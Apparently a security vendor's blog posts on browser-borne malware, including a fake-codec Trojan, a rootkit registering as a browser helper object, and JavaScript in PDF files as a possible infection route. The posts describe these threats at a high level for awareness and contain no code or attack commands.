The web browser is becoming the mostly used application in launching malware attacks. During the heyday of mass-mailing worms, the email client was the major source for malware infection. But today in the era of targeted attacks and information theft, the web browser has become the major distribution point for malware.

In fact, a recent study claims that web browsing has surpassed email as the top method for spreading malware. Malicious programs that come from the web do not necessarily originate from websites that offer illicit content such as pornography or serial number generators. On the contrary, the culprit websites often look legitimate as an effort to trick unsuspecting users, as in the case of the website where TROJ_ZLOB.ATH poses as a codec.

There is a common misconception that most malware arrive as attachments in an email from an unknown sender. This used to be true for worms that mass-mail themselves. But things change and you may never know if the next website that you visit after reading this blog would trick you into installing a backdoor into your system. In reality, it does take a while for security measures to catch up so I guess one of the things that can be done to prevent something like that from happening is to be aware of such issues, which is what this blog is for.

If you're new here, you may want to subscribe to our RSS feed. Thanks for visiting!

Browsers are often used as platforms by spyware and adware in order to execute. By installing themselves as browser helper objects, spyware and adware give themselves a chance to execute whenever the user fires up the browser to do some web surfing.

But this technique is no longer exclusive to such malicious programs. A rootkit can also register itself as a BHO in the case of TROJ_LINKOPTIM.G. Based on initial analysis, this Trojan is the rootkit component of TROJ_RKDICE.H. TROJ_LINKOPTIM.G connects to several URLs containing scripts that may compromise security on the affected system. As a security measure, these URLs are blocked from access. The Trojan also uses a dose of social engineering when it present itself as a Network Monitor API of Microsoft which is clearly a bogus claim.

A solution for this threat has already been deployed in CPR 3.748.06.

Remember the old days when we thought that Word documents were safe from viruses due to the assumption that they didn’t contain any piece of executable code? The sudden appearance of macro viruses proved us to be wrong back then.

The same thing could be happening right now for PDF files that can be read by Adobe Reader. Adobe Reader 7.0 has a functionality that allows the execution of JavaScript code present in a PDF file.

It is also possible for aplication to automatically open a website using the browser if there are links contained within the PDF document. A couple of specially-crafted PDF documents has proven this for us. It is no question that this extended functionality would eventually bring about PDF document borne malware that can access URLs and download possibly malicious files into the affected system. A possible drawback here (on the side of the attackers, that is) is that the application issues a prompt first whether the user wants to proceed accessing the website. However, by utilizing social engineering, a creative attacker or malware author can succeed despite that security measure.

Please take note that this is NOT a vulnerability in the said application. It is a functionality that is integrated within the application itself and can be disabled through user preferences in the Edit menu. By disabling javascript, execution of possible malicious code in the PDF document can be avoided. Although we have not yet seen any malware which is capable of using this method as of now, it’s better to be on guard always.